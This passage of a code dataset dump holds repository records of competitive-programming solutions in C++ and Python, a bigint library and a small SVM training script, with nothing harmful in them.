"max_line_length": 74, "num_lines": 49, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n \nusing namespace std;\n \nint matrix[300][300];\n \nvoid run()\n{\n int n, r, c;\n cin >> n >> r >> c;\n matrix[0][0] = 1;\n //n--;\n int ans = 1, u = n / 2, rc = 0;\n for (int i = 1; i <= u; ++i){\n if (ans + 2 > n)\n break;\n if (i >= min(r, c))\n break;\n matrix[i][0] = 1;\n matrix[0][i] = 1;\n ans += 2;\n rc++;\n // cout << ans << \" \" << n << \" \" << i << \" \" << min(r, c) << endl;\n }\n // n++;\n cout << rc + 1<< endl;\n for (int i = 0; i < r; ++i)\n for (int j = 0; j < c; ++j){\n // cout << i << \" \" << j << \" \" << ans << endl;\n if (matrix[i][j] == 0 && ans < n){\n matrix[i][j] = 1;\n ans++;\n }\n }\n \n for (int i = 0; i < r; i++, cout << \"\\n\")\n for (int j = 0; j < c; ++j)\n cout << (matrix[i][j] ? 
'#' : '.');\n}\n \nint main()\n{\n freopen(\"class.in\", \"r\", stdin);\n freopen(\"class.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.38461539149284363, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 18.5, "blob_id": "849c1a5e4bb32bcc85c8c7bb492a95e76337dfbb", "content_id": "277d220cfa6dfaace82333c2f7bed759dc0bb09c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 21, "num_lines": 2, "path": "/CodeForce/gym/396147/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint(n * 9 / 5 + 32)\n" }, { "alpha_fraction": 0.43302181363105774, "alphanum_fraction": 0.4704049825668335, "avg_line_length": 20.399999618530273, "blob_id": "e088a410681b8d1e6958f70de5d38058e503220b", "content_id": "8e4a7c9cc3d77e188f135a845c5a102f468ed249", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 44, "num_lines": 15, "path": "/CodeForce/0552/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "w, m = map(int, input().split())\nmass = []\nwhile m > 0:\n mass.append(m % w)\n m //= w\nmass.append(0)\nfor i in range(len(mass) - 1):\n if mass[i] >= w - 1:\n mass[i + 1] += 1\n mass[i] = 0\nok = 1\nfor i in range(len(mass)):\n if mass[i] > 1:\n ok = 0\nprint(\"NO\" if ok == 0 and w != 2 else \"YES\")\n" }, { "alpha_fraction": 0.458984375, "alphanum_fraction": 0.47265625, "avg_line_length": 20.29166603088379, "blob_id": "1b09c45bebde7d4447db482405bcc8f32441093e", "content_id": "f70a11850714ce94fae865f0aa66060e347c3fd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 61, "num_lines": 24, "path": "/2023/tin/6.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "# 
python 3.10\n\n\ndef compress_sequence(text: str) -> list[tuple[int, int]]:\n i = 0\n a = list(map(int, text.split(', ')))\n n = len(a)\n ans = []\n while i < n:\n j = i\n c = 0\n while j < n and a[i] == a[j]:\n j += 1\n c += 1\n\n ans.append((a[i], c))\n i = j\n return ans\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом.\n print(', '.join(map(str, compress_sequence(input_str))))\n\n" }, { "alpha_fraction": 0.6547278165817261, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28.08333396911621, "blob_id": "6dfad88b3b43fd457de64e8928f55362c3a9ffb2", "content_id": "3b9951c544417406392bd972fe7c5e8dd61d842c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2094, "license_type": "no_license", "max_line_length": 77, "num_lines": 72, "path": "/Ann/moons/train.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from sklearn import svm\nimport sys\nimport random\n\n#initializing\ntrain = []\nanswer = []\ntesting = []\n\n#reading input and parsing\nfor line in open('train.csv', 'r'):\n temp = list(map(float, line.split(',')))\n train.append(temp[:-1])\n answer.append(temp[-1])\nfor line in open('test.csv', 'r'):\n testing.append(list(map(float, line.split(','))))\n\n#checking how efficiently works one method. 
return percent of correct answers\ndef training(train, test, answerTrain, answerTest):\n print(clf)\n clf.fit(train, answerTrain)\n correct = 0\n x = clf.predict(test)\n n = len(test)\n for i in range(n):\n if answerTest[i] == x[i]:\n correct += 1\n return correct / n\n\n#unless we had test with answers, do it\n#dividing training set on 5 partitions : 4 fisrt -- training, 5th -- test\nn = len(train)\nk = n // 5\ntest = train[-k:]\ntrain = train[:-k]\nanswerTest = answer[-k:]\nanswerTrain = answer[:-k]\n\n#try different kernels and parametres, choose with max percent\nclf = svm.SVC()\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='linear')\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='sigmoid')\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='sigmoid', gamma=2)\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='sigmoid', gamma=2, coef0=2)\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='poly')\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='poly',degree=2)\nprint(training(train, test, answerTrain, answerTest))\n\nclf = svm.SVC(kernel='poly',degree=1, coef0=1)\nprint(training(train, test, answerTrain, answerTest))\n\n#the best one, polynomial kernel: (gamma <x, x'> + coef0) ^ degree,\n#degree = 3, coef0 = 3, gamma = 0.0 => gamma = 1/n_features\nclf = svm.SVC(kernel='poly', coef0=3)\nprint(training(train, test, answerTrain, answerTest))\n\n#output the answer\na = open('output.txt', 'w')\nfor i in clf.predict(testing):\n a.write(str(int(i)) + \"\\n\")\n" }, { "alpha_fraction": 0.3540229797363281, "alphanum_fraction": 0.3724137842655182, "avg_line_length": 9.875, "blob_id": "d804d69ba32fa08fa426156bd17363c69ed2e1f1", "content_id": "516433fb070641b63f9c2d77333ed0a40a78a878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 435, 
"license_type": "no_license", "max_line_length": 87, "num_lines": 40, "path": "/trash/cp/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\nstruct A\n{\n int id = 1000;\n int get()\n {\n return 1;\n }\n};\n\nstruct B : A\n{\n int get()\n {\n return 2;\n }\n};\n\nstruct C : A\n{\n int get()\n {\n return -A::get() * 2;\n }\n};\n\nstruct D : A {};\n\nint main()\n{\n A a;\n B b;\n C c;\n D d;\n std::cout << a.get() << \" \" << b.get() << \" \" << c.get() << \" \" << d.get() << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.43139931559562683, "alphanum_fraction": 0.4416382312774658, "avg_line_length": 23.35866928100586, "blob_id": "023ad559d7e96c6252409ccdeb6f9dea95455230", "content_id": "784d27191c2840e502a5594d253791d0abd6dfc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10255, "license_type": "no_license", "max_line_length": 101, "num_lines": 421, "path": "/scripts/A+B/bigint.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <writeln.h>\n\nusing namespace std;\n\n#define SZ(container) int(container.size())\n\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? 
l : r;\n}\n\nstatic constexpr int binpow(int x, int d) {\n int ret = 1;\n for (int i = 0; i < d; ++i)\n ret *= x;\n return ret;\n};\nstatic const int BASE = 10;\nstatic const int POW = 9;\ntemplate<typename T = int, size_t B = binpow(BASE, POW)>\nstruct bigint;\n\n// Ostream operator << {{{\ntemplate<typename T, size_t B>\nstd::ostream & operator<<(std::ostream &os, bigint<T, B> b)\n{\n return os << b.toString();\n} // }}}\n\n// Istream operator >> {{{\ntemplate<typename T, size_t B>\nstd::istream & operator>>(std::istream &is, bigint<T, B>& b)\n{\n string s;\n is >> s;\n b = bigint<T, B>(s);\n return is;\n} // }}}\n\ntemplate<typename T, size_t B>\nstruct bigint\n{\nprivate:\n vector<T> a = {0};\n int sign = 1;\n\npublic:\n auto begin() const { return a.crbegin(); }\n auto end() const { return a.crend(); }\n\nprivate:\n // Friend stream operators {{{\n friend std::ostream & operator<< <>(std::ostream &os, bigint<T, B> b);\n friend std::istream & operator>> <>(std::istream &os, bigint<T, B>& b);\n // }}}\n\n template<typename X, typename F>\n static void addVectors(vector<X>& x, const vector<X>& y, F f = bigint::add, int index = 0) // {{{\n {\n for (int i = 0, carry = 0; i < SZ(y) || carry; ++i)\n {\n const auto& [value, currentCarry] = f(getDigit(x, i + index), getDigit(y, i) + carry);\n setDigit(x, i + index, value);\n carry = currentCarry;\n }\n } // }}}\n\n template<typename X>\n static vector<X> mulVectorDigit(const vector<X>& x, X y) // {{{\n {\n vector<X> temp(SZ(x));\n X carry = 0;\n for (int i = 0; i < SZ(x) || carry; ++i)\n {\n const auto& [value, residue] = mul(getDigit(x, i), y);\n const auto& [summ, currentCarry] = add(residue, carry);\n setDigit(temp, i, summ);\n carry = value + currentCarry;\n }\n return move(temp);\n } // }}}\n\n template<typename X>\n static void mulVectors(vector<X>& x, const vector<X>& y) // {{{\n {\n vector<X> temp(SZ(x) + SZ(y) - 1);\n for (int i = 0; i < SZ(y); ++i)\n addVectors(temp, mulVectorDigit<X>(x, y[i]), bigint::add, 
i);\n x = temp;\n } // }}}\n\n pair<bigint, bigint> divmod(const bigint& x, const bigint& z) // {{{\n {\n bigint zero = bigint(0);\n if (z == zero)\n throw \"Division by zero!\";\n int xs = x.sign;\n int ys = z.sign;\n bigint y = z.abs();\n\n if (x.abs() < y)\n return {zero, x};\n\n bigint div, mod;\n div.a.clear();\n mod.a.clear();\n for (int i = SZ(a) - 1; i >= 0; --i)\n {\n mod.a.insert(mod.a.begin(), a[i]);\n mod.trimZeroes();\n T xxx = binSearch(T(0), T(B), [&](T m) { return bigint(m) * y > mod; }, T(1));\n if (xxx)\n {\n --xxx;\n mod -= bigint(xxx) * y;\n div.a.insert(div.a.begin(), xxx);\n div.trimZeroes();\n }\n }\n div.sign = xs * ys;\n mod.sign = xs;\n return {div, mod};\n } // }}}}\n\n //Secure arithmetics {{{\n static pair<T, T> add(T x, T y)\n {\n if (x >= B - y)\n return {x - (B - y), 1};\n return {x + y, 0};\n }\n\n static pair<T, T> sub(T x, T y)\n {\n if (x < y)\n return {x + (B - y), 1};\n return {x - y, 0};\n }\n\n static pair<T, T> mul(T x, T y)\n {\n long long m = x * 1ll * y;\n return {m / B, m % B};\n }\n // }}}\n\n //Secure get by index {{{\n T get(unsigned i) { return getDigit(a, i); }\n\n template<typename C>\n static T getDigit(C& c, unsigned i)\n {\n return c[i];\n //return i >= c.size() || i < 0 ? 
T(0) : c[i];\n } // }}}\n\n //Secure set by index {{{\n template<typename C>\n static void setDigit(C& c, unsigned i, T value)\n {\n if (i >= c.size())\n c.push_back(value);\n else\n c[i] = value;\n } // }}}\n\n // Trim leading zeroes {{{\n template<typename C>\n void trimZeroes(C& c)\n {\n while (c.size() > 1 && !c.back())\n c.pop_back();\n if (c.size() == 0)\n c.push_back(T(0));\n }\n\n void trimZeroes()\n {\n trimZeroes(a);\n } // }}}\n\n bigint abs() const // {{{\n {\n bigint res = *this;\n res.sign *= res.sign;\n return res;\n } // }}}\n \n //Shift-unshift {{{\n void shift(int d)\n {\n int sz = min(size(), ::abs(d));\n if (d > 0)\n a.erase(a.begin() + size() - sz, a.end());\n else\n a.erase(a.begin(), a.begin() + sz);\n trimZeroes();\n }\n\n void unshift(int d)\n {\n vector<T> temp(d, 0);\n copy(a.begin(), a.end(), back_inserter(temp));\n a = temp;\n }\n // }}}\n\n //Karatsuba multiply {{{\n void fastMul(const bigint& y)\n {\n int xs = size();\n int ys = y.size();\n int m = max(xs, ys) / 2;\n bigint a0(*this);\n bigint a1(*this);\n bigint b0(y);\n bigint b1(y);\n\n a0.shift(max(0, xs - m));\n a1.shift(-m);\n b0.shift(max(0, ys - m));\n b1.shift(-m);\n\n bigint&& a0b0 = a0 * b0;\n bigint&& a1b1 = a1 * b1;\n bigint&& temp = (a0 + a1) * (b0 + b1) - a0b0 - a1b1;\n\n temp.unshift(m);\n a1b1.unshift(2 * m);\n\n *this = a0b0 + temp + a1b1;\n } // }}}\n\n string toString() // {{{\n {\n stringstream os;\n int l = a.size();\n if (sign == -1 && (l != 1 || a[0]))\n os << '-';\n for (int i = 0; i < a.size(); ++i)\n {\n string temp = to_string(a[l - i - 1]);\n if (i && temp.size() != POW) os << string(POW - temp.size(), '0');\n os << temp;\n }\n return os.str();\n } // }}}\n\npublic:\n // Constuctors {{{\n bigint() {}\n\n bigint(long long x)\n {\n if (x < 0)\n sign = -1,\n x *= -1;\n a.clear();\n while (x)\n a.push_back(x % B),\n x /= B;\n a.push_back(0);\n trimZeroes();\n }\n\n bigint(const string& s)\n {\n a.resize(SZ(s) / POW, 0);\n bool ok = s[0] == '-';\n int exs = 
(SZ(s) - ok) % POW;\n if (exs)\n a.push_back(stoi(s.substr(ok, exs)));\n for (int i = exs + ok; i < SZ(s); i += POW)\n a.push_back(stoi(s.substr(i, POW).c_str()));\n reverse(a.begin(), a.end());\n if (ok) sign = -1;\n trimZeroes();\n }\n // }}}\n\n void operator=(const bigint& v) { // {{{\n sign = v.sign;\n a = v.a;\n } // }}}\n\n template<typename T1>\n void operator=(const T1& v) {\n *this = bigint(v);\n };\n\n T operator[](int i) { return a[i]; }\n\n int size() const { return SZ(a); }\n\n // ?= operators {{{\n bigint& operator+=(const bigint& x) // {{{\n {\n if (sign == x.sign)\n addVectors(a, x.a, bigint::add),\n trimZeroes();\n else\n *this -= -x;\n return *this;\n } // }}}\n\n bigint& operator-=(const bigint& x) // {{{\n {\n if (sign == x.sign)\n {\n if (abs() < x.abs())\n {\n bigint temp = x;\n temp -= *this;\n *this = -temp;\n return *this;\n }\n addVectors(a, x.a, bigint::sub);\n trimZeroes();\n }\n else\n *this += -x;\n return *this;\n } // }}}\n\n bigint& operator*=(const bigint& x) // {{{\n {\n int resSign = sign * x.sign;\n sign = 1;\n if (x.size() * size() <= 3000)\n mulVectors(a, x.a);\n else\n fastMul(x);\n sign = resSign;\n return *this;\n }\n // }}}\n\n bigint& operator/=(const bigint& x) // {{{\n {\n *this = divmod(*this, x).first;\n return *this;\n }\n // }}}\n\n bigint& operator%=(const bigint& x) // {{{\n {\n *this = divmod(*this, x).second;\n return *this;\n }\n // }}}\n // }}}\n\n // Binary operators {{{\n bigint operator+(const bigint& v) const { return bigint(*this) += v; }\n bigint operator-(const bigint& v) const { return bigint(*this) -= v; }\n bigint operator/(const bigint& v) const { return bigint(*this) /= v; }\n bigint operator%(const bigint& v) const { return bigint(*this) %= v; }\n bigint operator*(const bigint& v) const { return bigint(*this) *= v; }\n bigint operator-() const { bigint res = *this; res.sign = -sign; return res; }\n // }}}\n\n // Compare operators {{{\n bool operator<(const bigint &v) const\n {\n if (sign != 
v.sign)\n return sign < v.sign;\n if (a.size() != v.a.size())\n return a.size() * sign < v.a.size() * sign;\n for (int i = SZ(a) - 1; i >= 0; i--)\n if (a[i] != v.a[i])\n return a[i] * sign < v.a[i] * sign;\n return false;\n }\n\n bool operator>(const bigint &v) const { return v < *this; }\n bool operator<=(const bigint &v) const { return !(v < *this); }\n bool operator>=(const bigint &v) const { return !(*this < v); }\n bool operator==(const bigint &v) const { return !(*this < v) && !(v < *this); }\n bool operator!=(const bigint &v) const { return *this < v || v < *this; }\n // }}}\n\n // Cast {{{\n template<typename T2, size_t B2>\n operator bigint<T2, B2>() {\n typedef bigint<T2, B2> bigint2;\n bigint2 temp(0);\n bigint2 deg(1);\n bigint2 base(B);\n for (T& x : a)\n temp += deg * bigint2(x),\n deg *= base;\n if (sign == -1)\n temp *= bigint2(-1);\n return temp;\n }\n // }}}\n\n void write() const\n {\n for (auto&& x : *this)\n cout << x << \" \";\n writeln();\n }\n};\n\nint main()\n{\n bigint c, d;\n readln(c, d);\n writeln(c + d);\n writeln(c - d);\n writeln(c * d);\n writeln(c / d, c % d);\n return 0;\n}\n" }, { "alpha_fraction": 0.5390070676803589, "alphanum_fraction": 0.6241135001182556, "avg_line_length": 19.095237731933594, "blob_id": "8adc94811e44528c8bf8667bd8bd84f960c95044", "content_id": "4b81f1c684e4a11c9867028cb4782c573670fa14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "no_license", "max_line_length": 38, "num_lines": 21, "path": "/CodeForce/gym/396147/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nif n < 1200:\n print('Newbie')\nelif n < 1400:\n print('Pupil')\nelif n < 1600:\n print('Specialist')\nelif n < 1900:\n print('Expert')\nelif n < 2100:\n print('Candidate Master')\nelif n < 2300:\n print('Master')\nelif n < 2400:\n print('International Master')\nelif n < 2600:\n print('Grandmaster')\nelif n < 3000:\n 
print('International Grandmaster')\nelse:\n print('Legendary Grandmaster')\n\n" }, { "alpha_fraction": 0.4402279853820801, "alphanum_fraction": 0.4534273147583008, "avg_line_length": 28.63111114501953, "blob_id": "abe9190399c1d864985a0782f2cb57a9f0ee31f0", "content_id": "f12ba6b3e39a1573386ffc7a506b6e1be7eb9202", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6667, "license_type": "no_license", "max_line_length": 210, "num_lines": 225, "path": "/2022/snws1/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#define _USE_MATH_DEFINES\n\nusing namespace std;\nconst double EPS = 1E-9;\nconst double PI = M_PI;\n \nstruct pt {\n\tdouble x, y;\n\tpt() { }\n\tpt (double x, double y) : x(x), y(y) { }\n\tpt operator- (const pt & p) const {\n\t\treturn pt (x-p.x, y-p.y);\n\t}\n};\n \ndouble dist (const pt & a, const pt & b) {\n\treturn sqrt ((a.x-b.x)*(a.x-b.x) + (a.y-b.y)*(a.y-b.y));\n}\n \ndouble get_ang (const pt & a, const pt & b) {\n\tdouble ang = abs (atan2 (a.y, a.x) - atan2 (b.y, b.x));\n\treturn min (ang, 2*PI-ang);\n}\n \nstruct line {\n\tdouble a, b, c;\n\tline (const pt & p, const pt & q) {\n\t\ta = p.y - q.y;\n\t\tb = q.x - p.x;\n\t\tc = - a * p.x - b * p.y;\n\t\tdouble z = sqrt (a*a + b*b);\n\t\ta/=z, b/=z, c/=z;\n\t}\n};\n \ndouble det (double a, double b, double c, double d) {\n\treturn a * d - b * c;\n}\n \npt intersect (const line & n, const line & m) {\n\tdouble zn = det (n.a, n.b, m.a, m.b);\n\treturn pt (\n\t\t- det (n.c, n.b, m.c, m.b) / zn,\n\t\t- det (n.a, n.c, m.a, m.c) / zn\n\t);\n}\n \nbool parallel (const line & n, const line & m) {\n\treturn abs (det (n.a, n.b, m.a, m.b)) < EPS;\n}\n \ndouble get_h (const pt & p1, const pt & p2,\n\tconst pt & l1, const pt & l2, const pt & r1, const pt & r2)\n{\n\tpt q1 = intersect (line (p1, p2), line (l1, l2));\n\tpt q2 = intersect (line (p1, p2), line (r1, r2));\n\tdouble l = dist (q1, q2);\n\tdouble alpha = 
get_ang (l2 - l1, p2 - p1) / 2;\n\tdouble beta = get_ang (r2 - r1, p1 - p2) / 2;\n\treturn l * sin(alpha) * sin(beta) / sin(alpha+beta);\n}\n \nstruct cmp {\n\tbool operator() (const pair<double,int> & a, const pair<double,int> & b) const {\n\t\tif (abs (a.first - b.first) > EPS)\n\t\t\treturn a.first < b.first;\n\t\treturn a.second < b.second;\n\t}\n};\n \n#define pointtt template<typename T = int>\npointtt struct point\n{\n T x, y;\n point(){}\n point(T _x, T _y) : x(_x), y(_y) {}\n point(const point& other) : x(other.x), y(other.y) {}\n point operator=(const point& b) { x = b.x; y = b.y; return *this; }\n point operator+(const point& b) const { return point(x + b.x, y + b.y); }\n point operator-(const point& b) const { return point(x - b.x, y - b.y); }\n point operator-() const { return point(-x, -y); }\n T operator*(const point& b) const { return x * b.x + y * b.y; }\n T operator^(const point& b) const { return x * b.y - y * b.x; }\n T operator!() const { return x * x + y * y; }\n bool operator<(const point& b) const { return x == b.x ? 
y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,const point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(const point<T>&a,const point<T>&b){return!point<T>(a-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(const point<T>&a,const point<T>&b,const point<T>&c){return{abs((a-b)*c)+(a^b),dist(a,b)};}\nstatic const int CW = 1;\nstatic const int CCW = -1;\npointtt int orientation(const point<T>&a,const point<T>&b,const point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?CCW:q<0?CW:0;}\n//reflects point C to line AB (in doubles)\npointtt point<T> reflect(const point<T>&a,const point<T>&b,const point<T>&c){\n T A = a.y - b.y;\n T B = b.x - a.x;\n T C = a ^ b;\n T D = A * A - B * B;\n T S = A * A + B * B;\n return {(-D * c.x - 2 * A * B * c.y - 2 * A * C) / S, (D * c.y - 2 * A * B * c.x - 2 * B * C) / S};\n};\n\n//IgorjanconvexHull\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define all(a) a.begin(), a.end()\n#define ll long long\npointtt void convexHull(vector<point<T>>&a){sort(all(a));int n=size(a),j=-1,k=0;ROF(i,n-2,0)a.push_back(a[i]);fori(n){while(j>k&&orientation(a[j-1],a[j],a[i])!=1)--j;a[++j]=a[i];if(!k&&i==n-1)k=j;}a.resize(j);}\n\nint main() {\n int q;\n cin >> q;\n vector<double> ks;\n for (int Q = 0; Q < q; Q++)\n {\n int n;\n cin >> n;\n vector<point<ll>> P;\n fori(n)\n {\n point<ll> ppp;\n cin >> ppp;\n P.push_back(ppp);\n while (P.size() >= 3)\n {\n int sz = P.size();\n if (orientation(P[sz - 3], P[sz - 2], P[sz - 1]) == 0)\n P[sz - 2] = P[sz - 1],\n P.pop_back();\n else\n break;\n }\n\n }\n if (P.size() >= 3)\n {\n int sz = P.size();\n if (orientation(P[sz - 2], P[sz - 1], P[0]) == 0)\n P.pop_back();\n }\n if (P.size() >= 3)\n {\n int sz = P.size();\n if (orientation(P[sz - 1], P[0], P[1]) == 0)\n 
P.erase(P.begin());\n }\n n = P.size();\n vector<pt> p(n);\n for (int i = 0; i < n; ++i)\n p[i].x = P[i].x,\n p[i].y = P[i].y;\n \n \n vector<int> next (n), prev (n);\n for (int i=0; i<n; ++i) {\n next[i] = (i + 1) % n;\n prev[i] = (i - 1 + n) % n;\n }\n \n set < pair<double,int>, cmp > q;\n vector<double> h (n);\n for (int i=0; i<n; ++i) {\n h[i] = get_h (\n p[i], p[next[i]],\n p[i], p[prev[i]],\n p[next[i]], p[next[next[i]]]\n );\n q.insert (make_pair (h[i], i));\n }\n \n double last_time;\n while (q.size() > 2) {\n last_time = q.begin()->first;\n int i = q.begin()->second;\n q.erase (q.begin());\n \n next[prev[i]] = next[i];\n prev[next[i]] = prev[i];\n int nxt = next[i], nxt1 = (nxt+1)%n,\n prv = prev[i], prv1 = (prv+1)%n;\n if (parallel (line (p[nxt], p[nxt1]), line (p[prv], p[prv1])))\n break;\n \n q.erase (make_pair (h[nxt], nxt));\n q.erase (make_pair (h[prv], prv));\n \n h[nxt] = get_h (\n p[nxt], p[nxt1],\n p[prv1], p[prv],\n p[next[nxt]], p[(next[nxt]+1)%n]\n );\n h[prv] = get_h (\n p[prv], p[prv1],\n p[(prev[prv]+1)%n], p[prev[prv]],\n p[nxt], p[nxt1]\n );\n \n q.insert (make_pair (h[nxt], nxt));\n q.insert (make_pair (h[prv], prv));\n }\n \n ks.push_back(last_time);\n }\n int k;\n cin >> k;\n vector<int> a(k);\n fori(k)\n cin >> a[i];\n sort(all(ks));\n sort(all(a));\n int cnt = 0;\n int i = 0;\n for (auto x: a)\n {\n while (i < q && x > ks[i])\n ++i;\n if (i < q)\n ++i,\n ++cnt;\n }\n cout << cnt << endl;\n}\n" }, { "alpha_fraction": 0.43654823303222656, "alphanum_fraction": 0.46515920758247375, "avg_line_length": 24.439023971557617, "blob_id": "a4b10a88579a620e552802606dc387da31db61d1", "content_id": "56a4d53d7c3158b6f36d7289b875ccb2730e39e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2503, "license_type": "no_license", "max_line_length": 72, "num_lines": 82, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma 
comment(linker, \"/STACK:16000000\")\r\n#include <vector>\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <fstream>\r\n#include <cstdio>\r\n#include <stdio.h>\r\n#define INF 1000000000\r\nusing namespace std;\r\n \r\nvector<bool> used_glob;\r\nvector<vector<int>> edges;\r\nvector<int> diams;\r\n \r\nint dfs1(int v, int d, vector<bool>& used) {\r\n    if (used[v])\r\n        return 0;\r\n    int max_deep = d;\r\n    used[v] = 1;\r\n    for (int i = 0; i < edges[v].size(); i++) {\r\n        max_deep = max(max_deep, dfs1(edges[v][i], d + 1, used));\r\n    }\r\n    return max_deep;\r\n}\r\n \r\nvoid dfs2(int v, int depth, int cur_d, int &new_v, vector<bool>& used) {\r\n    if (used[v])\r\n        return;\r\n    used[v] = 1;\r\n    if (depth == cur_d) {\r\n        new_v = v;\r\n        return;\r\n    }\r\n    for (int i = 0; i < edges[v].size(); i++) {\r\n        dfs2(edges[v][i], depth, cur_d + 1, new_v, used);\r\n    }\r\n}\r\n \r\nvoid find_d(int v) {\r\n    vector<bool> used = vector<bool>(edges.size(), false);\r\n    int deep1 = dfs1(v, 0, used);\r\n    used = vector<bool>(used.size(), false);\r\n    int new_v;\r\n    dfs2(v, deep1, 0, new_v, used);\r\n    int ans = dfs1(new_v, 0, used_glob);\r\n    diams.push_back(ans);\r\n}\r\nvoid main(){\r\n    //ifstream in(\"in.txt\"); \r\n    //ofstream out(\"out.txt\");\r\n    int n, l;\r\n    cin >> n >> l;\r\n    edges = vector<vector<int>>(n);\r\n    for (int i = 0; i < l; i++) {\r\n        int a, b;\r\n        cin >> a >> b;\r\n        edges[a].push_back(b);\r\n        edges[b].push_back(a);\r\n    }\r\n    used_glob = vector<bool>(n, false);\r\n    for (int i = 0; i < n; i++) {\r\n        if (!used_glob[i])\r\n            find_d(i);\r\n    }\r\n    if (diams.size() == 1) {\r\n        cout << diams[0];\r\n        return;\r\n    } \r\n    if (diams.size() == 2) {\r\n        int a = diams[0];\r\n        int b = diams[1];\r\n        cout << max(a, a / 2 + a % 2 + b / 2 + b % 2 + 1);\r\n    } else {\r\n        
sort(diams.begin(), diams.end());\r\n        int a = diams[diams.size() - 1];\r\n        int b = diams[diams.size() - 2];\r\n        int c = diams[diams.size() - 3];\r\n        int ans = max(a, a / 2 + a % 2 + b / 2 + b % 2 + 1);\r\n        ans = max(ans, b / 2 + b % 2 + c / 2 + c % 2 + 2);\r\n        cout << ans;\r\n    }\r\n}\n" }, { "alpha_fraction": 0.37799718976020813, "alphanum_fraction": 0.401974618434906, "avg_line_length": 26.269229888916016, "blob_id": "f4c5982ed4965b9baa0345e5e80619542e8793be", "content_id": "d2e4f1cbdcbb266d32fb2b0420e8880911f46049", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 709, "license_type": "no_license", "max_line_length": 48, "num_lines": 26, "path": "/2019/GCJ/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\ndef main():\n n, l = map(int, input().split())\n a = list(map(int, input().split()))\n b = [0] * (l + 1)\n for i in range(l - 1):\n if a[i] != a[i + 1]:\n pi = math.gcd(a[i], a[i + 1])\n b[i + 1] = pi\n for j in range(i, -1, -1):\n b[j] = a[j] // b[j + 1]\n for j in range(i + 2, l + 1):\n b[j] = a[j - 1] // b[j - 1]\n c = list(sorted(list(set(b))))\n d = {}\n if len(c) != 26:\n sys.exit(1)\n for i in range(len(c)):\n d[c[i]] = chr(ord('A') + i)\n print(''.join(map(lambda x: d[x], b)))\n\nfor t in range(int(input())):\n sys.stdout.write(\"Case #{}: \".format(t + 1))\n main()\n" }, { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.4455128312110901, "avg_line_length": 25, "blob_id": "88a297da94cb86070edbf41f25f7f7d2d7fec530", "content_id": "68cd1dd385c0ee7b7c69b5b4b5d16334e023f16d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 44, "num_lines": 12, "path": "/scripts/A+B/A+B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a, b = map(int, input().split())\nprint(a + 
